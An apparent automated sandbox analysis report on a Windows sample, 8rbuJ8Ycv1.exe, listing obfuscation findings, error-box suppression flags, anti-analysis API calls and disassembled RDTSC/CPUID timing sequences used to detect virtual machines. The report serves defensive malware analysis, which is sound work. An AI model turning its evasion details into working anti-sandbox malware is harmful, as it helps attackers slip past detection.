Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_00406636 push ebp; iretd	0_2_00406640
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DA75 push 00000051h; ret	0_2_02A7DA78
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7EB07 push ecx; retf	0_2_02A7EB08
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056EB07 push ecx; retf	16_2_0056EB08

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100B TerminateProcess,	0_2_02A7100B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70919 EnumWindows,LoadLibraryA,	0_2_02A70919
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22 LoadLibraryA,NtSetInformationThread,	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE NtWriteVirtualMemory,	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A742E7	0_2_02A742E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2 NtWriteVirtualMemory,	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1 NtWriteVirtualMemory,	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7122B TerminateProcess,	0_2_02A7122B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A NtWriteVirtualMemory,	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71209 TerminateProcess,	0_2_02A71209
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71275 TerminateProcess,	0_2_02A71275
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7424C	0_2_02A7424C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71A54 TerminateProcess,	0_2_02A71A54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713BF TerminateProcess,	0_2_02A713BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7438F	0_2_02A7438F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F NtWriteVirtualMemory,	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397 NtWriteVirtualMemory,	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713FF TerminateProcess,	0_2_02A713FF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1 NtWriteVirtualMemory,	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0 NtWriteVirtualMemory,TerminateProcess,	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71328 TerminateProcess,	0_2_02A71328
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710A6 TerminateProcess,	0_2_02A710A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A718A6 TerminateProcess,	0_2_02A718A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A758A4 LoadLibraryA,	0_2_02A758A4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A748B7	0_2_02A748B7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7188F TerminateProcess,	0_2_02A7188F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7208F	0_2_02A7208F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A720E3	0_2_02A720E3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710F3 TerminateProcess,	0_2_02A710F3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E8D5	0_2_02A7E8D5
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB NtWriteVirtualMemory,	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100E TerminateProcess,	0_2_02A7100E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71012 TerminateProcess,	0_2_02A71012
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71071 TerminateProcess,	0_2_02A71071
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71871 TerminateProcess,	0_2_02A71871
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843 NtWriteVirtualMemory,	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A719B1 TerminateProcess,	0_2_02A719B1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E98A	0_2_02A7E98A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74990	0_2_02A74990
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A789EE	0_2_02A789EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4 NtWriteVirtualMemory,	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74926	0_2_02A74926
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73924	0_2_02A73924
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73921	0_2_02A73921
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71967 TerminateProcess,	0_2_02A71967
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71165 TerminateProcess,	0_2_02A71165
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E961	0_2_02A7E961
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976 NtWriteVirtualMemory,	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7214F	0_2_02A7214F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E86	0_2_02A71E86
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7469F	0_2_02A7469F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7 NtWriteVirtualMemory,	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E67	0_2_02A71E67
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647 NtWriteVirtualMemory,	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71644 TerminateProcess,	0_2_02A71644
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71654 TerminateProcess,	0_2_02A71654
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC NtWriteVirtualMemory,	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71FFB	0_2_02A71FFB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A747FB	0_2_02A747FB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A717C7 TerminateProcess,	0_2_02A717C7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71F37	0_2_02A71F37
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709 NtWriteVirtualMemory,	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71717 TerminateProcess,	0_2_02A71717
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7177A TerminateProcess,	0_2_02A7177A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74744	0_2_02A74744
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB NtWriteVirtualMemory,	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74433	0_2_02A74433
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432 NtWriteVirtualMemory,	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71463 TerminateProcess,	0_2_02A71463
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A NtWriteVirtualMemory,	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75 NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82 NtWriteVirtualMemory,	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582 NtWriteVirtualMemory,	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71592 TerminateProcess,	0_2_02A71592
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A745DB	0_2_02A745DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72D30	0_2_02A72D30
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7450F	0_2_02A7450F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F NtWriteVirtualMemory,	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576 NtWriteVirtualMemory,	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7455F	0_2_02A7455F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E89F	16_2_0056E89F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E98A	16_2_0056E98A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056E961	16_2_0056E961

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A7C96F second address: 0000000002A7C96F instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A708F9 second address: 0000000002A708F9 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A71C4A second address: 0000000002A71C4A instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77AC4 second address: 0000000002A77AC4 instructions:
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76A8A second address: 0000000002A76B31 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor esi, 58A792A8h 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 xor esi, 318B51C7h 0x0000001a add esi, 2B3F7621h 0x00000020 test dx, ax 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+00000206h] 0x0000002a test dl, cl 0x0000002c mov dword ptr [ebp+00000240h], eax 0x00000032 test ah, FFFFFFD5h 0x00000035 mov eax, 808116E1h 0x0000003a cmp bx, AA3Fh 0x0000003f xor eax, 669D47CFh 0x00000044 jmp 00007F2994B84CF2h 0x00000046 cmp ebx, ecx 0x00000048 add eax, 0060AF4Eh 0x0000004d cmp cl, dl 0x0000004f sub eax, E67D007Bh 0x00000054 test dh, 00000000h 0x00000057 cmp edi, 60808D3Eh 0x0000005d push eax 0x0000005e mov eax, dword ptr [ebp+00000240h] 0x00000064 test esi, F9C4EDE0h 0x0000006a sub edi, 20h 0x0000006d mov dword ptr [ebp+00000202h], ebx 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76B31 second address: 0000000002A76BDC instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+00000202h] 0x00000010 test bh, bh 0x00000012 cmp edx, eax 0x00000014 add edi, 20h 0x00000017 mov dword ptr [ebp+0000023Eh], ecx 0x0000001d mov ecx, edi 0x0000001f push ecx 0x00000020 test dx, ax 0x00000023 mov ecx, dword ptr [ebp+0000023Eh] 0x00000029 test dl, cl 0x0000002b mov dword ptr [ebp+0000023Bh], ecx 0x00000031 mov ecx, 005F6649h 0x00000036 test ah, 00000036h 0x00000039 sub ecx, 2C1083A2h 0x0000003f cmp bx, AC4Fh 0x00000044 xor ecx, A25F7B13h 0x0000004a test ah, ch 0x0000004c sub ecx, 761199B3h 0x00000052 jmp 00007F2994B84CD6h 0x00000054 test bl, al 0x00000056 push ecx 0x00000057 cmp ecx, F5C42B54h 0x0000005d mov ecx, dword ptr [ebp+0000023Bh] 0x00000063 test al, bl 0x00000065 mov dword ptr [ebp+0000010Ch], 00000000h 0x0000006f mov eax, ebp 0x00000071 add eax, 0000010Ch 0x00000076 pushad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A76BDC second address: 0000000002A76C00 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001F8h], esi 0x00000010 cmp dl, al 0x00000012 mov esi, eax 0x00000014 push esi 0x00000015 test dl, al 0x00000017 mov esi, dword ptr [ebp+000001F8h] 0x0000001d cmp dx, ax 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	RDTSC instruction interceptor: First address: 0000000002A77665 second address: 0000000002A77665 instructions:
